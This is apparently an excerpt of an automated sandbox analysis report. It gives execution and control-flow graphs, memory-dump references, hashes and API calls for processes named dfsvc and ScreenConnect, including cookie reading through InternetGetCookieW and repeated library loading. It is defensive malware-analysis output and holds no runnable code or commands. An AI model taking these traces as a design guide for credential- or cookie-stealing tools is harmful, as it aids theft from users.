                                                                                                                                                                                                    • Part of subcall function 009C474D: IsProcessorFeaturePresent.KERNEL32(00000017,009C473C,00000000,?,00000004,00000000,?,?,?,?,009C4749,00000000,00000000,00000000,00000000,00000000), ref: 009C474F
                                                                                                                                                                                                    • Part of subcall function 009C474D: GetCurrentProcess.KERNEL32(C0000417), ref: 009C4771
                                                                                                                                                                                                    • Part of subcall function 009C474D: TerminateProcess.KERNEL32(00000000), ref: 009C4778
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000000.00000002.1410791934.00000000009C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 009C0000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000000.00000002.1410748021.00000000009C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411112111.00000000009CB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411129564.00000000009D1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000000.00000002.1411151197.00000000009D3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9c0000_pzPO97QouM.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Process$CurrentFeaturePresentProcessorTerminate_free
                                                                                                                                                                                                  • String ID: *?$.
                                                                                                                                                                                                  • API String ID: 2667617558-3972193922
                                                                                                                                                                                                  • Opcode ID: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                  • Instruction ID: 9c341d827e1060e7b4b5105d397c43e98ee325505411febd08250a89c844760e
                                                                                                                                                                                                  • Opcode Fuzzy Hash: b5ebe54ac363d96a5ffd237f2e5e25fa63b2e5d383b99c3f0f4b770ea8c32303
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 62518E75E00219AFDF14CFA8C891FAEBBB9EF98710F24816EE454E7341E6359A018B51

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:15.3%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                  Total number of Nodes:180
                                                                                                                                                                                                  Total number of Limit Nodes:22
                                                                                                                                                                                                  execution_graph 33525 7ff887cf36d7 33526 7ff887cf36e3 33525->33526 33529 7ff887cf2f80 33526->33529 33528 7ff887cf370a 33530 7ff887cf58a0 33529->33530 33533 7ff887cf2f00 33530->33533 33532 7ff887cf5929 33532->33528 33534 7ff887cf5990 33533->33534 33537 7ff887cf3f30 33534->33537 33536 7ff887cf59b4 33536->33532 33539 7ff887cf3f55 33537->33539 33540 7ff887cf15c8 33537->33540 33539->33536 33541 7ff887cf15d1 33540->33541 33542 7ff887cf1683 33541->33542 33543 7ff887cf1802 LoadLibraryExW 33541->33543 33542->33539 33544 7ff887cf1836 33543->33544 33544->33539 33675 7ff887d2281a 33676 7ff887d22823 33675->33676 33677 7ff887cf4c90 LoadLibraryExW 33676->33677 33678 7ff887d2284b 33677->33678 33679 7ff887cf4c90 LoadLibraryExW 33678->33679 33680 7ff887d22933 33679->33680 33681 7ff887d22997 33680->33681 33682 7ff887cf5990 LoadLibraryExW 33680->33682 33682->33681 33545 7ff887d231dd 33546 7ff887d231e5 33545->33546 33547 7ff887d2325a 33546->33547 33550 7ff887d23444 33546->33550 33549 7ff887d232f7 33547->33549 33552 7ff887d08a20 33547->33552 33550->33549 33556 7ff887cf4c90 33550->33556 33553 7ff887d08a4d 33552->33553 33561 7ff887cf72b0 33553->33561 33555 7ff887d08a92 33557 7ff887cf4cc3 33556->33557 33558 7ff887cf4cb8 33556->33558 33559 7ff887cf3f30 LoadLibraryExW 33557->33559 33558->33549 33560 7ff887cf4cc8 33559->33560 33560->33549 33562 7ff887cf72d6 33561->33562 33563 7ff887cf72df 33561->33563 33562->33555 33564 7ff887cf3f30 LoadLibraryExW 33563->33564 33565 7ff887cf72e4 33564->33565 33565->33555 33566 7ff887d000d2 33568 7ff887d00100 33566->33568 33567 7ff887d00249 33568->33567 33569 7ff887d0025a InternetGetCookieW 33568->33569 33570 7ff887d002c9 33569->33570 33587 7ff887cf6c91 33588 7ff887cf4c90 LoadLibraryExW 33587->33588 33589 7ff887cf6c99 33588->33589 33642 7ff887d22461 33643 7ff887d2246b 33642->33643 33644 7ff887cf5990 LoadLibraryExW 33643->33644 33645 7ff887d2261b 33643->33645 33644->33645 33650 7ff887cf994b 33651 7ff887cf9944 33650->33651 33651->33650 33652 7ff887cf9a0e CreateFileW 33651->33652 33653 7ff887cf9a8c 33652->33653 33683 7ff887cfc60b 33684 7ff887cfc61c 33683->33684 33685 7ff887cf4c90 LoadLibraryExW 33684->33685 33686 7ff887cfc663 33685->33686 33691 7ff887cfa4c0 33686->33691 33688 7ff887cfc674 33689 7ff887cf4c90 LoadLibraryExW 33688->33689 33690 7ff887cfc682 33688->33690 33689->33690 33692 7ff887cfd350 33691->33692 33693 7ff887cfd460 33692->33693 33695 7ff887cfd3cc 33692->33695 33696 7ff887cf4c90 LoadLibraryExW 33693->33696 33694 7ff887cf4c90 LoadLibraryExW 33699 7ff887cfd449 33694->33699 33695->33694 33696->33699 33697 7ff887cfd62c 33697->33688 33698 7ff887cfd5db 33701 7ff887cf4c90 LoadLibraryExW 33698->33701 33699->33697 33699->33698 33700 7ff887cf4c90 LoadLibraryExW 33699->33700 33700->33698 33701->33697 33654 7ff887cfa545 33656 7ff887cfa54d 33654->33656 33655 7ff887d3a2b5 33656->33655 33658 7ff887d272a0 33656->33658 33659 7ff887d272c5 33658->33659 33661 7ff887d273dd 33659->33661 33662 7ff887cfa518 33659->33662 33661->33656 33664 7ff887d27520 33662->33664 33663 7ff887d2759c 33663->33659 33664->33663 33665 7ff887cf4c90 LoadLibraryExW 33664->33665 33665->33663 33702 7ff887d2202f 33703 7ff887d22034 33702->33703 33704 7ff887cf4c90 LoadLibraryExW 33703->33704 33706 7ff887d22052 33704->33706 33705 7ff887d2206e 33706->33705 33707 7ff887cf5990 LoadLibraryExW 33706->33707 33708 7ff887d22286 33707->33708 33709 7ff887cf5990 LoadLibraryExW 33708->33709 33710 7ff887d2230b 33709->33710 33590 7ff887cfa87f 33591 7ff887cf72b0 LoadLibraryExW 33590->33591 33592 7ff887cfa887 33591->33592 33597 7ff887cf33c0 33592->33597 33594 7ff887cfa8bf 33595 7ff887cf4c90 LoadLibraryExW 33594->33595 33596 7ff887cfaa53 33595->33596 33598 7ff887cf33b4 33597->33598 33598->33597 33601 7ff887cf3c81 33598->33601 33600 7ff887cf378e 33600->33594 33602 7ff887cf3cae 33601->33602 33605 7ff887cf2e48 33602->33605 33604 7ff887cf3d19 33604->33600 33606 7ff887cf3e70 33605->33606 33611 7ff887cf2e08 33606->33611 33608 7ff887cf3ec9 33608->33604 33609 7ff887cf3e8a 33609->33608 33615 7ff887cf2e30 33609->33615 33612 7ff887cf3f30 33611->33612 33613 7ff887cf15c8 LoadLibraryExW 33612->33613 33614 7ff887cf3f55 33612->33614 33613->33614 33614->33609 33617 7ff887cf2e35 33615->33617 33616 7ff887cf2e59 33617->33616 33618 7ff887cf2e08 LoadLibraryExW 33617->33618 33620 7ff887cf3e8a 33618->33620 33619 7ff887cf3ec9 33619->33608 33620->33619 33621 7ff887cf2e30 LoadLibraryExW 33620->33621 33621->33619 33622 7ff887d229b2 33624 7ff887d229e4 33622->33624 33623 7ff887d22d86 33624->33623 33626 7ff887cf5990 33624->33626 33627 7ff887cf3f30 LoadLibraryExW 33626->33627 33628 7ff887cf59b4 33627->33628 33628->33623 33629 7ff887d290b6 33631 7ff887d290c3 33629->33631 33630 7ff887d29053 33631->33630 33632 7ff887cf72b0 LoadLibraryExW 33631->33632 33633 7ff887d29210 33632->33633 33634 7ff887cf34b6 33637 7ff887cf34cb 33634->33637 33635 7ff887cf3c81 LoadLibraryExW 33636 7ff887cf378e 33635->33636 33637->33635 33711 7ff887cf3d36 33712 7ff887cf3d3d 33711->33712 33713 7ff887cf2e48 LoadLibraryExW 33712->33713 33714 7ff887cf3e2a 33713->33714 33717 7ff887cf2e20 33714->33717 33719 7ff887cf2e25 33717->33719 33718 7ff887cf2e59 33719->33718 33720 7ff887cf2e08 LoadLibraryExW 33719->33720 33722 7ff887cf3e8a 33720->33722 33721 7ff887cf3e4c 33722->33721 33723 7ff887cf2e30 LoadLibraryExW 33722->33723 33723->33721 33670 7ff887d28346 33671 7ff887d282e3 33670->33671 33672 7ff887d2835c 33670->33672 33673 7ff887cf72b0 LoadLibraryExW 33672->33673 33674 7ff887d283a0 33673->33674 33735 7ff887d02923 33738 7ff887d0292f 33735->33738 33736 7ff887d028e5 33737 7ff887cf72b0 LoadLibraryExW 33739 7ff887d02a32 33737->33739 33738->33736 33738->33737 33571 7ff887d217cc 33572 7ff887d217d5 33571->33572 33573 7ff887cf4c90 LoadLibraryExW 33572->33573 33574 7ff887d217e0 33573->33574 33575 7ff887cf4c90 LoadLibraryExW 33574->33575 33578 7ff887d219d4 33574->33578 33576 7ff887d2188e 33575->33576 33577 7ff887cf4c90 LoadLibraryExW 33576->33577 33576->33578 33577->33578 33579 7ff887d215cf 33580 7ff887d215de 33579->33580 33581 7ff887cf4c90 LoadLibraryExW 33580->33581 33582 7ff887d21641 33580->33582 33581->33582 33583 7ff887cf4c90 LoadLibraryExW 33582->33583 33586 7ff887d219d4 33582->33586 33584 7ff887d2188e 33583->33584 33585 7ff887cf4c90 LoadLibraryExW 33584->33585 33584->33586 33585->33586 33740 7ff887d22714 33742 7ff887d22719 33740->33742 33741 7ff887d22997 33742->33741 33743 7ff887cf4c90 LoadLibraryExW 33742->33743 33744 7ff887d22933 33743->33744 33744->33741 33745 7ff887cf5990 LoadLibraryExW 33744->33745 33745->33741

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000001.00000002.2247303893.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff887cf0000_dfsvc.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: ]
                                                                                                                                                                                                  • API String ID: 0-3352871620
                                                                                                                                                                                                  • Opcode ID: e49d735a37e6645c9eea857f4bb395a5b72cb9ad632d6c52cf066a5aa73a90d2
                                                                                                                                                                                                  • Instruction ID: 0d4c58584463ba5e085d0c7fa041b54e947c0c7386de0e6fae67bcbe9e58ce36
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e49d735a37e6645c9eea857f4bb395a5b72cb9ad632d6c52cf066a5aa73a90d2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D3B14862E4DE895FE745DBAC98192BD7BE1FF52360B0841BFC049C3293EE689806C341

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 1548 7ff887cffd8d-7ff887cffd93 1548->1548 1549 7ff887cffd95-7ff887cffd9b 1548->1549 1551 7ff887cffd9d-7ff887cffda3 1549->1551 1551->1551 1552 7ff887cffda5 1551->1552 1553 7ff887cffda7-7ff887cffdad 1552->1553 1553->1553 1554 7ff887cffdaf-7ff887cffdb4 1553->1554 1556 7ff887cffdb7-7ff887cffdbd 1554->1556 1556->1556 1557 7ff887cffdbe-7ff887cffdc4 1556->1557 1559 7ff887cffdc7-7ff887cffdcd 1557->1559 1559->1559 1560 7ff887cffdce-7ff887d00198 1559->1560 1566 7ff887d001a5-7ff887d001aa 1560->1566 1567 7ff887d0019a-7ff887d001a2 1560->1567 1568 7ff887d001b7-7ff887d001c3 1566->1568 1569 7ff887d001ac-7ff887d001b4 1566->1569 1567->1566 1570 7ff887d00249-7ff887d00250 1568->1570 1571 7ff887d001c9-7ff887d001fc 1568->1571 1569->1568 1573 7ff887d00252-7ff887d00258 1571->1573 1574 7ff887d001fe-7ff887d00200 1571->1574 1580 7ff887d0025a-7ff887d002c7 InternetGetCookieW 1573->1580 1575 7ff887d00202-7ff887d00214 1574->1575 1576 7ff887d00239-7ff887d00247 1574->1576 1577 7ff887d00216 1575->1577 1578 7ff887d00218-7ff887d0022b 1575->1578 1576->1580 1577->1578 1578->1578 1581 7ff887d0022d-7ff887d00235 1578->1581 1582 7ff887d002cf-7ff887d002e2 1580->1582 1583 7ff887d002c9 1580->1583 1581->1576 1584 7ff887d00307-7ff887d00339 call 7ff887d00355 1582->1584 1585 7ff887d002e4-7ff887d00306 1582->1585 1583->1582 1589 7ff887d00340-7ff887d00354 1584->1589 1590 7ff887d0033b 1584->1590 1585->1584 1590->1589
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000001.00000002.2247303893.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff887cf0000_dfsvc.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: (]X
                                                                                                                                                                                                  • API String ID: 0-3761561620
                                                                                                                                                                                                  • Opcode ID: 29635512cbef7dcd8d452be85098d4d01fec62d211a6e3b6c3f750882ddc41ef
                                                                                                                                                                                                  • Instruction ID: f41d98851f06046bfc828a81fc247bb934351e1bcac96280f90707d5d166a908
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 29635512cbef7dcd8d452be85098d4d01fec62d211a6e3b6c3f750882ddc41ef
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F2A1EF31908A898FEB69DF28D8553E97BE1FF59350F04427FD84EC7292CA74A845C782
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000001.00000002.2247303893.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff887cf0000_dfsvc.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 1651cd36238266c8fc83563d6592f906bfca31ca521ebd9b17515bf2f740d113
                                                                                                                                                                                                  • Instruction ID: 1b31218882bbca7f2ee4620403aa02c4b864708a70170ba8e458592fcba74a78
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 1651cd36238266c8fc83563d6592f906bfca31ca521ebd9b17515bf2f740d113
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1881CF30508A8D4FDBA9DF28C8557E97BE1FF99311F04426ED85EC7292CA74A845CB82
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000001.00000002.2247303893.00007FF887CF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CF0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff887cf0000_dfsvc.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                  • Opcode ID: fd3ba3df9aec48e934c14219bcc8d2c262a26cdd34857d6ed965bc1954a79d1d
                                                                                                                                                                                                  • Instruction ID: b585317ac3657c49f499758f9a89051b8d776507dc3c333934904bbe7402a1c5
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fd3ba3df9aec48e934c14219bcc8d2c262a26cdd34857d6ed965bc1954a79d1d
                                                                                                                                                                                                  • Instruction Fuzzy Hash: E351AD3190CA4C8FDB98DF68D845BA9BBF0FB69310F1442AEE04DD3252CB34A841CB81
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000001.00000002.2246880169.00007FF887BDD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887BDD000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_1_2_7ff887bdd000_dfsvc.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                  • Opcode ID: 928da0163d993444c70b8dce56c67324a650fddf8ce4a765540672cda39bc829
                                                                                                                                                                                                  • Instruction ID: 70860cfb5c2fcc3ecf6469b1da584af76805b7e398b4d0f84f8b40c6c72f692b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 928da0163d993444c70b8dce56c67324a650fddf8ce4a765540672cda39bc829
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7A41233080DBC44FE356CB3898459923FF0FF56324B1505EFD088CB1A3D625A846C792

                                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                                  Execution Coverage:12.4%
                                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                                                  Signature Coverage:0%
                                                                                                                                                                                                  Total number of Nodes:12
                                                                                                                                                                                                  Total number of Limit Nodes:0
                                                                                                                                                                                                  execution_graph 12050 7ff887cc3df2 12051 7ff887cdf470 CloseHandle 12050->12051 12053 7ff887cdf4eb 12051->12053 12054 7ff887cc4890 12055 7ff887cc4899 GetTokenInformation 12054->12055 12057 7ff887cdf2d7 12055->12057 12046 7ff887cc84b8 12047 7ff887cc84bf SetProcessMitigationPolicy 12046->12047 12049 7ff887cc8552 12047->12049 12058 7ff887ccf67b 12059 7ff887ccf687 CreateFileW 12058->12059 12061 7ff887ccf7bc 12059->12061

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 422 7ff887cc4890-7ff887cc48d9 428 7ff887cc48dc 422->428 428->428 429 7ff887cc48de-7ff887cc4949 428->429 437 7ff887cc494c 429->437 437->437 438 7ff887cc494e-7ff887cdf2d5 GetTokenInformation 437->438 444 7ff887cdf2d7 438->444 445 7ff887cdf2dd-7ff887cdf30e 438->445 444->445
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000A.00000002.1771815345.00007FF887CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CC0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff887cc0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: InformationToken
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 4114910276-0
                                                                                                                                                                                                  • Opcode ID: fefd8e2785392ebf7826dbc59aec1e2d0b1bf18e97c57aa2846bbc5ffbe90821
                                                                                                                                                                                                  • Instruction ID: 31f5c5d03772bde0c5d8ab24a8f5e8fa90db15d89ba8182d6c99d25220d9410a
                                                                                                                                                                                                  • Opcode Fuzzy Hash: fefd8e2785392ebf7826dbc59aec1e2d0b1bf18e97c57aa2846bbc5ffbe90821
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9761D372D4DEC45FE3198AACA8056B9BFF1FBA5710F0841BFD0498728BCA249D06C395

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 447 7ff887ccf67b-7ff887ccf710 452 7ff887ccf712-7ff887ccf717 447->452 453 7ff887ccf71a-7ff887ccf7ba CreateFileW 447->453 452->453 455 7ff887ccf7c2-7ff887ccf7f5 453->455 456 7ff887ccf7bc 453->456 456->455
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000A.00000002.1771815345.00007FF887CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CC0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff887cc0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                                  • Opcode ID: 9816f1189d361e16f394334086812e7e1fc7407ccbb41269a9064922a65544c0
                                                                                                                                                                                                  • Instruction ID: 8de02a5f77d7ec6eba917f2a22d9ba838234f520bf338f2fc23f8e7d5423a5cd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9816f1189d361e16f394334086812e7e1fc7407ccbb41269a9064922a65544c0
                                                                                                                                                                                                  • Instruction Fuzzy Hash: D2516D7190CA5C9FDB68DF58D845BA9BBF1FB59310F1442AEE04DD3252CB34A845CB81

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 562 7ff887cc84b8-7ff887cc8550 SetProcessMitigationPolicy 565 7ff887cc8552 562->565 566 7ff887cc8558-7ff887cc8587 562->566 565->566
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000A.00000002.1771815345.00007FF887CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CC0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff887cc0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MitigationPolicyProcess
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1088084561-0
                                                                                                                                                                                                  • Opcode ID: 8daccb8b2aedac066f3787351ebdc6270747085173e87f5867cc0571e408f7a1
                                                                                                                                                                                                  • Instruction ID: ecb6c2500af24b6217e2a9c60f90066e90ef23409e6d2e958908d3d1ffd8f8b8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8daccb8b2aedac066f3787351ebdc6270747085173e87f5867cc0571e408f7a1
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4B31817191CB188FDB28AB9DD84A6F97BE0EB65711F00422EE449D3252DB74A8458B82

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 568 7ff887cc3eaa-7ff887cc84ef 570 7ff887cc84f6-7ff887cc8550 SetProcessMitigationPolicy 568->570 571 7ff887cc8552 570->571 572 7ff887cc8558-7ff887cc8587 570->572 571->572
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000A.00000002.1771815345.00007FF887CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CC0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff887cc0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: MitigationPolicyProcess
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1088084561-0
                                                                                                                                                                                                  • Opcode ID: 920d9d97a544a3d577a17ff3ca0e3c0eccc1c85185d4b0158d955390879b6e75
                                                                                                                                                                                                  • Instruction ID: 945cfe470983ca2e978e507eb180e105b1e4eaa79a2e7d02cab9fa5bda67d448
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 920d9d97a544a3d577a17ff3ca0e3c0eccc1c85185d4b0158d955390879b6e75
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C121A57191CB188FDB18AF9DD84AAFA7BE0EB59711F00412EE04AD3251DB74B8458B92
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000A.00000002.1771815345.00007FF887CC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887CC0000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_10_2_7ff887cc0000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseHandle
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 2962429428-0
                                                                                                                                                                                                  • Opcode ID: 8b6871257c262089543632a970ed974a81ecffcb3017b9b839f7bf7f7c3a1b4c
                                                                                                                                                                                                  • Instruction ID: cdf975fb114c294ff8205ae00f7095b781dcc99247eab052aedcb84310d2957b
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8b6871257c262089543632a970ed974a81ecffcb3017b9b839f7bf7f7c3a1b4c
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B219C71908A1C9FDB58DB98C449BF9BBE0FB65321F00422ED04AD3252DB64A856CB91
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: t*Jt$t*Jt
                                                                                                                                                                                                  • API String ID: 0-3942707866
                                                                                                                                                                                                  • Opcode ID: 793c566c2f03476c3d46cc99a9126ff7feda050e1d81b7ca54aff6fe629c50fe
                                                                                                                                                                                                  • Instruction ID: 0d3c5e2cd82be327ec491a428879370a5ce6227255b90990962e1881673e2263
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 793c566c2f03476c3d46cc99a9126ff7feda050e1d81b7ca54aff6fe629c50fe
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7C11A171B00209AFEB54DE69D800EABB7B6AFC4A24F14C465D904D7250EB71A9018BA0
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 0-76226702
                                                                                                                                                                                                  • Opcode ID: d02f856873206b4e5602b4498ce32e186fd52285e1cd0b1e597214fa0997f7d2
                                                                                                                                                                                                  • Instruction ID: 9fd62fa95b7e636264a79dd19af7f4a1b726f40fe75c52ecd30d8be1b2695c46
                                                                                                                                                                                                  • Opcode Fuzzy Hash: d02f856873206b4e5602b4498ce32e186fd52285e1cd0b1e597214fa0997f7d2
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9151C030700245CFD755DB39D958AAE7BF2EF88614B1840A9D806DB3A2EF34DC46CB91
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: ['
                                                                                                                                                                                                  • API String ID: 0-410297704
                                                                                                                                                                                                  • Opcode ID: 4ef7c8d6c6ec2cb2bcbf2405a78af7958b30ec66753849a770f2ef02aa8fc6a4
                                                                                                                                                                                                  • Instruction ID: e80c3c112f61278b61d8bc3669f0430f75e18f54da796cc65cbd6db69a670def
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4ef7c8d6c6ec2cb2bcbf2405a78af7958b30ec66753849a770f2ef02aa8fc6a4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 3B31D0347007069BC715EB79D85096EB7F6FB8C6503088929D82ADB340EF70ED498BD1
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 0000000B.00000002.1764259986.0000000001350000.00000040.00000800.00020000.00000000.sdmp, Offset: 01350000, based on PE: false
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_1350000_ScreenConnect.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                  • String ID: t*Jt
                                                                                                                                                                                                  • API String ID: 0-2906470731
                                                                                                                                                                                                  • Opcode ID: 85767660f25c340240a6fdd1572f79e4648388c670ff3ec9939c7f8f2ebb270c
                                                                                                                                                                                                  • Instruction ID: e70b0868d50a881a5e9096cb0896cef9090fe5f8d3bb140d620b0a09eabb6792
